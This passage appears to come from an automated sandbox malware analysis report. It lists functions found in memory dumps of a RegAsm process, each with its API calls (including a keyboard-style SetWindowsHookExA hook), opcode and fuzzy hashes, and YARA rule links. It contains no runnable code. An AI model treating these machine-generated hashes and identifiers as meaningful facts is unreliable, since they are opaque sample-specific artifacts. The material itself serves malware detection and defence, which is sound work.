                                                • Opcode Fuzzy Hash: 3c9acfd9d5d7e9607c7b8274864ba3a8274a276b6eb0d651a4148189e78577f3
                                                • Instruction Fuzzy Hash: 5421E4B5D002589FDB10CFAAD985ADEFBF4EB48314F14841AE914A7310D379A944CF65
                                                Function 06D5D983 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06D5DA03
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: e87c794a1899b74c0c1ea2be82f1cd4fcf9f2795194dd8affbeced62b89ebab9
                                                • Instruction ID: a930a5874dd65835204065e35f39f9382c789aa028dd42ae24a780350000ee51
                                                • Opcode Fuzzy Hash: e87c794a1899b74c0c1ea2be82f1cd4fcf9f2795194dd8affbeced62b89ebab9
                                                • Instruction Fuzzy Hash: AD210475D002599FCB15CF9AC844BEEFBF5AF88310F14842AE458A7650C774A944CFA5
                                                Function 06D5D988 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06D5DA03
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: 34d07d4d716e8a927072fc59340117d1f4b0666dd9b92baf3038b300a2d4afb5
                                                • Instruction ID: e325b6e38ab56d8157ba595d1793557b4062aec40f300cb34dbe429ee6ef408e
                                                • Opcode Fuzzy Hash: 34d07d4d716e8a927072fc59340117d1f4b0666dd9b92baf3038b300a2d4afb5
                                                • Instruction Fuzzy Hash: C32113B5D002488FCB14CF9AC844BEEFBF5AF88310F14842AE458A7650CB74A944CFA5
                                                Function 015EEA10 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNEL32 ref: 015EEA77
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3677904770.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_15e0000_RegAsm.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 0e83137b9ee8badddc1e427a2dfd35615cad2298389a78133ff145e17d02d38f
                                                • Instruction ID: 8e467fff8aa915b3f5d7c4e941096e7ecf16ccd1780b7cde5929e8556d5837ec
                                                • Opcode Fuzzy Hash: 0e83137b9ee8badddc1e427a2dfd35615cad2298389a78133ff145e17d02d38f
                                                • Instruction Fuzzy Hash: A01142B2C006599FDB14CF9AC448BDEFBF4FB08224F14812AE818A7240D378A944CFA5
                                                Function 06D55448 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 06D554B6
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 3c8805870144955e4df46a02c1e7610bc3f9a479d6d2dd61e6617725eb25b289
                                                • Instruction ID: 3ca80083c7ce300cd2fd38112dbc394c676ff3c3619e24170401bf2236240d87
                                                • Opcode Fuzzy Hash: 3c8805870144955e4df46a02c1e7610bc3f9a479d6d2dd61e6617725eb25b289
                                                • Instruction Fuzzy Hash: B41102B6C006498FDB10CF9AD444BDEFBF1AB88215F24882AD819B7710C379A546CFA1
                                                Function 06D5BCE9 Relevance: 1.6, APIs: 1, Instructions: 50comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 06D5BD45
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: a69046e2ab4ddff8b45ea5f56be7fbdfa6f767bc89dac46cb2d13c848307b07a
                                                • Instruction ID: a50aaf097d90c4c11377b0ce891546aebf4a1c2bae81e2862657855df74950ed
                                                • Opcode Fuzzy Hash: a69046e2ab4ddff8b45ea5f56be7fbdfa6f767bc89dac46cb2d13c848307b07a
                                                • Instruction Fuzzy Hash: 2D1136B6D002888FCB20CFAAD444BDEFBF4EB48224F24845AD559A7700C375A544CFA5
                                                Function 06D539BC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 06D554B6
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 57eaa87701a90a1b5e6893b66c17cb719c91e54dd165d84d959b2a4feeaa10d8
                                                • Instruction ID: 403cc8188aa182f981898aede1f9abd20378ed950323b494a858090776f90a1e
                                                • Opcode Fuzzy Hash: 57eaa87701a90a1b5e6893b66c17cb719c91e54dd165d84d959b2a4feeaa10d8
                                                • Instruction Fuzzy Hash: 0611F0B6C007498FDB21CF9AD844B9EFBF4EB89224F15842AD819B7600C379A545CFA5
                                                Function 06D5B707 Relevance: 1.5, APIs: 1, Instructions: 49comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 06D5BD45
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 3688d99214da6be231e27e93c294104b59841e54eb9ccc6c488bc65152de4656
                                                • Instruction ID: c57951be96271e4bc1eab131aff3f2ef08a18b34984c81fbac438405ba80c833
                                                • Opcode Fuzzy Hash: 3688d99214da6be231e27e93c294104b59841e54eb9ccc6c488bc65152de4656
                                                • Instruction Fuzzy Hash: CE1125B6C003488FDB20CFAAD484B9EBBF4EB48224F24851AD559A7710C779A545CBA9
                                                Function 06D5B710 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 06D5BD45
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 2fd6fc256316be91e982f80d28dce456d00ed6a30501cbe9f53957f3fa23f21f
                                                • Instruction ID: 3f34ee5546a33744a771bfe030931d894783d89b6b934202c3dfc90476b4bfdb
                                                • Opcode Fuzzy Hash: 2fd6fc256316be91e982f80d28dce456d00ed6a30501cbe9f53957f3fa23f21f
                                                • Instruction Fuzzy Hash: 0D1115B5C007488FDB60CF9AC944BDEFBF4EB48224F14845AD919A7710C778A944CFA9
                                                Function 06D5B420 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06D5B3FD), ref: 06D5B487
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: d38223b2ea24a2fac02330df9ab0ae5637e2d136f3ff1e6a40d60265b954ba39
                                                • Instruction ID: 10780f12a60739b88d14c501be5537d7d0735cc7b55f2a7bf32b15d50106d8e3
                                                • Opcode Fuzzy Hash: d38223b2ea24a2fac02330df9ab0ae5637e2d136f3ff1e6a40d60265b954ba39
                                                • Instruction Fuzzy Hash: 7111F2B5800659CFDB20CF9AD845BDEBBF4AB48328F24841AE518A7640C778A544CFA5
                                                Function 06D59E64 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06D5B3FD), ref: 06D5B487
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: c0ff9af0a0ee82dec1740d49f69459b84f5282af66e339d844a1b899e4c24b2d
                                                • Instruction ID: aa131b136f8cf1c11b5248055820d1b7a95f8cf5be627046ce0001c6e02e2349
                                                • Opcode Fuzzy Hash: c0ff9af0a0ee82dec1740d49f69459b84f5282af66e339d844a1b899e4c24b2d
                                                • Instruction Fuzzy Hash: 701122B18007488FCB20DF9AD844BAEFBF4EB48224F24841AE918A7700C374A944CBA5
                                                Function 02FB2468 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (q
                                                • API String ID: 0-2414175341
                                                • Opcode ID: b04dcf57bee8c75616597c0e174c051508185e7854012a543b6da4afdd826b3c
                                                • Instruction ID: 9172edaca101f2e821ccd69d2d86352cab068e8df841cc5656d1b6dd05bd165b
                                                • Opcode Fuzzy Hash: b04dcf57bee8c75616597c0e174c051508185e7854012a543b6da4afdd826b3c
                                                • Instruction Fuzzy Hash: 3FA19C71E003098FDB05DFA9C8947EEFBF2AF88350F148569D905AB351DB34A945CB91
                                                Function 06D64BB8 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: XPq
                                                • API String ID: 0-1601936878
                                                • Opcode ID: f132cfe6bcdbc6b9dec27206b2670dfe60d705b088a8bdb1fd0f54c8880d2ebf
                                                • Instruction ID: c389b9507d3c52441f5d780568c2be725103a201b60de3f0abd9252d72ecaed1
                                                • Opcode Fuzzy Hash: f132cfe6bcdbc6b9dec27206b2670dfe60d705b088a8bdb1fd0f54c8880d2ebf
                                                • Instruction Fuzzy Hash: 43416E70F002089FDB549BA9C814B9EBBF6FFC9700F208529E506AB395DA758C05CF91
                                                Function 06D6DB05 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq
                                                • API String ID: 0-3820536768
                                                • Opcode ID: bbcfa486259ba9b818733e6de5434e483261d0f5b9428feeaccd1efb7217f0a9
                                                • Instruction ID: 6fa79cfbbf3b86120aaf5746a6078ed69a036cad4099145407a24ab5fcdf400d
                                                • Opcode Fuzzy Hash: bbcfa486259ba9b818733e6de5434e483261d0f5b9428feeaccd1efb7217f0a9
                                                • Instruction Fuzzy Hash: A9419030F003499FDB64DF6AE4546AEBBB2FF85700F11452AE416DB244DBB0E846CB91
                                                Function 06D621F5 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq
                                                • API String ID: 0-3820536768
                                                • Opcode ID: b7df4decbf61d0a7e91a387664b55f5f527c90de08de4fb8eee61b40541c794b
                                                • Instruction ID: 2361815efb9fcf695dd40a877e25787b6fa57eeea4f3e3040f6e9c0d61a20741
                                                • Opcode Fuzzy Hash: b7df4decbf61d0a7e91a387664b55f5f527c90de08de4fb8eee61b40541c794b
                                                • Instruction Fuzzy Hash: 68310F30B102028FDBA8AB3AD45476E7BE2FB89700F148568E406EB394EF35DD46C791
                                                Function 06D62208 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHq
                                                • API String ID: 0-3820536768
                                                • Opcode ID: 6c9a38c838584a917721cc7970a484ee602f0798c0cc8a5059217821426dc82e
                                                • Instruction ID: bb3ba0e4b7093309b23eee6c45b3defb0f9a5e0e9024d83719d69821d602e2d0
                                                • Opcode Fuzzy Hash: 6c9a38c838584a917721cc7970a484ee602f0798c0cc8a5059217821426dc82e
                                                • Instruction Fuzzy Hash: B8311E30B002068FDBA8AB7AD05466E7BE3BBC9700B20852CE406EB394DF35DD06C791
                                                Function 02FB0040 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (q
                                                • API String ID: 0-2414175341
                                                • Opcode ID: 8add685cde7682f5d78933d5735db197326f5ad494a0ae9fcfc13f13063c70db
                                                • Instruction ID: 85e74955a44adcc1ed991bcd5f5128647ad10a23a28dcf61a3f7ac8b05af2458
                                                • Opcode Fuzzy Hash: 8add685cde7682f5d78933d5735db197326f5ad494a0ae9fcfc13f13063c70db
                                                • Instruction Fuzzy Hash: FA213660F002455FDB59EB79A8203BFBBFACFC154071441AED80ADB341ED248D0283E2
                                                Function 02FB277F Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (q
                                                • API String ID: 0-2414175341
                                                • Opcode ID: 8fb4937fb6273ae277a76893844105c1c8a6cf7b980206fb41e6b9988353d22a
                                                • Instruction ID: f518f916a6eaed718ce4e5e77ae4b769462b1e5ddf814bc054bc819e50e525db
                                                • Opcode Fuzzy Hash: 8fb4937fb6273ae277a76893844105c1c8a6cf7b980206fb41e6b9988353d22a
                                                • Instruction Fuzzy Hash: 4C3104B1D01208DFEB25DFA9D588BDEBBF1EF88304F24842AE505AB250C7759845CFA5
                                                Function 02FB02B0 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (q
                                                • API String ID: 0-2414175341
                                                • Opcode ID: 7a70958ef775d5100a2d86a06a1c8812ed3524248daccfe0f086e6b81c5844f9
                                                • Instruction ID: db558d384a55fa026b182339d6fe6c26e417232c6db63bf8d612971534e7eca3
                                                • Opcode Fuzzy Hash: 7a70958ef775d5100a2d86a06a1c8812ed3524248daccfe0f086e6b81c5844f9
                                                • Instruction Fuzzy Hash: 4701D231209385DFC70AAF60E8105EA3F71EF8B310B19449BE5808F562CA359C16DBA3
                                                Function 06D642F9 Relevance: .2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dda1c3b50b842255c269aca7b8b1ab05c655efaafeefcffe22f3283c56827957
                                                • Instruction ID: 8a1fa0ddd15cd56aecb98506a35b24b6bd88c9f5c63e3c109468c53ddaf36662
                                                • Opcode Fuzzy Hash: dda1c3b50b842255c269aca7b8b1ab05c655efaafeefcffe22f3283c56827957
                                                • Instruction Fuzzy Hash: 8A812D70B106099FDB94DFA9D4547AEBBF2EF89300F108529E409EB394DA74EC428B91
                                                Function 06D66248 Relevance: .2, Instructions: 229COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48fb8522ccdcb6f0df2555c00a22cd424dded1ccdcc01dccd82184fd76ecba05
                                                • Instruction ID: 219eb125aee372821c07f128ad174e308caaf2efcbc11dafe71a4a26992ad507
                                                • Opcode Fuzzy Hash: 48fb8522ccdcb6f0df2555c00a22cd424dded1ccdcc01dccd82184fd76ecba05
                                                • Instruction Fuzzy Hash: 6561A571F001114FDF649B7EC88069EBAD7AFC8624B194439E80ADB364DEB5ED4287D2
                                                Function 06D64618 Relevance: .2, Instructions: 222COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5f2cc7602a140ea19503d0f12c7640f1ec7d216b90d4b35b548fda12c2a6175
                                                • Instruction ID: ba6db5721080d14abe03a96d6ae0ecc00189f85dbba46b2d66daf5d8c9cc1159
                                                • Opcode Fuzzy Hash: d5f2cc7602a140ea19503d0f12c7640f1ec7d216b90d4b35b548fda12c2a6175
                                                • Instruction Fuzzy Hash: FC913F34E002198FDF60DF65C890BDDB7B1FF89310F208699E549BB255DB70A985CB91
                                                Function 06D64630 Relevance: .2, Instructions: 210COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 299785628242e77990ecbd39bcffe59b7e714debe4f33e452c2bb6e5e99523c5
                                                • Instruction ID: 04dd48789047ccdbd960f6a120789408ad2cd4cabaf349b645efd1fe9c411c54
                                                • Opcode Fuzzy Hash: 299785628242e77990ecbd39bcffe59b7e714debe4f33e452c2bb6e5e99523c5
                                                • Instruction Fuzzy Hash: 82912C34E102198BDF60DF69C890B9DB7B1FF89310F20C699D549BB255DB70A986CF90
                                                Function 06D6EB78 Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a85e2a3653f920ae8e5b9282bf7fc9a95df53ff242b0a1db2b7ece0791a613b
                                                • Instruction ID: 3438ffd8520cf100076199235827f299477139c23776579d93022fb7d9465e58
                                                • Opcode Fuzzy Hash: 9a85e2a3653f920ae8e5b9282bf7fc9a95df53ff242b0a1db2b7ece0791a613b
                                                • Instruction Fuzzy Hash: 3A710734E002099FDB54DFA9D984AADBBF6FFC8310F248429E406AB254DB70EC46CB51
                                                Function 06D6EB73 Relevance: .2, Instructions: 200COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0cd3275a2f642b8740f7096a4b6ac60c67b775b71554717e245c76c333f6649b
                                                • Instruction ID: 05b28ab27e6c14312c004f5a2cc54af97c41edb6c51a4cbbfaf6932ff53213b6
                                                • Opcode Fuzzy Hash: 0cd3275a2f642b8740f7096a4b6ac60c67b775b71554717e245c76c333f6649b
                                                • Instruction Fuzzy Hash: 6E711634E042099FDB54DBA9D984AADBBF6FFC8310F248529E016AB354DB70EC46CB50
                                                Function 06D6EB6F Relevance: .2, Instructions: 192COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f14b159a02abf9d5a58b79f5c89793bf4d6590c29f4fed7c4c447df0de13853a
                                                • Instruction ID: 349b44c57d763528516635d4d18fb21341de2996cd6a39f958897a1eeb0cdce8
                                                • Opcode Fuzzy Hash: f14b159a02abf9d5a58b79f5c89793bf4d6590c29f4fed7c4c447df0de13853a
                                                • Instruction Fuzzy Hash: 8F711834E042099FDB54DFA9D984AADBBF6FFC8310F248569E016AB254DB30EC46CB50
                                                Function 06D6FC07 Relevance: .2, Instructions: 174COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e00051e2a4657df85219a1f2d14c5a3c231250069f2b57914ff2923aa932a05
                                                • Instruction ID: 8b60bbce2efce57ba0b4d9cb6e7fa80837827d222d2c1227536ed7a849bbd575
                                                • Opcode Fuzzy Hash: 8e00051e2a4657df85219a1f2d14c5a3c231250069f2b57914ff2923aa932a05
                                                • Instruction Fuzzy Hash: 6551DF31E00609DFDF64EBB9F4986ADBBB3FB84310F118869E106DB290DB359855CB90
                                                Function 06D6F9BB Relevance: .2, Instructions: 166COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e76c4d826a058ff80af25cf4fb1e13a2de370c5a8c8e8da549ef3bf5ddbaace4
                                                • Instruction ID: 9f5c36cb09d1296cf4020422c2099fff7a788e54bedd99d7182285b5445ed463
                                                • Opcode Fuzzy Hash: e76c4d826a058ff80af25cf4fb1e13a2de370c5a8c8e8da549ef3bf5ddbaace4
                                                • Instruction Fuzzy Hash: 8E51C370F103159BEF649B6DE858B6F269BD789750F20442AF50ACB394CD79CC4283A2
                                                Function 06D6F9C0 Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f07a2c066d56ab79c3000a59994d36277782c82fd12f6ab55be90d822a2b193b
                                                • Instruction ID: 62a3bc415a32da88f0f68f2655a495a4df41a491e50846b45a1d287f88d5e400
                                                • Opcode Fuzzy Hash: f07a2c066d56ab79c3000a59994d36277782c82fd12f6ab55be90d822a2b193b
                                                • Instruction Fuzzy Hash: 76519270F103159BEF64976DE858B6F269BE789750F20442AE50ADB3A4CD79CC4283A2
                                                Function 02FB25D9 Relevance: .1, Instructions: 136COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3679807113.0000000002FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_2fb0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d3b892ac9d060a336b9665311a50e15054d76988bfa8fbc008a10c8e0520185b
                                                • Instruction ID: f3ce34e8ec1cbf3b07dc1231c86da3762039ca21b1bfdaecb8c3e5ab879d8b72
                                                • Opcode Fuzzy Hash: d3b892ac9d060a336b9665311a50e15054d76988bfa8fbc008a10c8e0520185b
                                                • Instruction Fuzzy Hash: CC41F375F042098FDF06DBA5D8A56EEBBF2AF88350F184459D901AB341DA34AD01CBA5
                                                Function 06D65470 Relevance: .1, Instructions: 135COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bb06331b39ca1652de59126c325b5a77d9cf896473959628bdc143b4c76bb683
                                                • Instruction ID: b967f8b4ff08613d991710ee1972cced5c167a3c2cc8fdeb67c833744559905a
                                                • Opcode Fuzzy Hash: bb06331b39ca1652de59126c325b5a77d9cf896473959628bdc143b4c76bb683
                                                • Instruction Fuzzy Hash: 69416371E006098FDF70CF9AE8846BFF7B2FB88210F10496AE156D7650D770E9958B91
                                                Function 06D620B8 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7154768c50cb66dc5de77d74f2d423eee1ca882b9f34c1b5ecca5e048af77480
                                                • Instruction ID: c8dcf889aae7abdde339f10e3702014fbc13c1ad806f4f985f656dd6575f1223
                                                • Opcode Fuzzy Hash: 7154768c50cb66dc5de77d74f2d423eee1ca882b9f34c1b5ecca5e048af77480
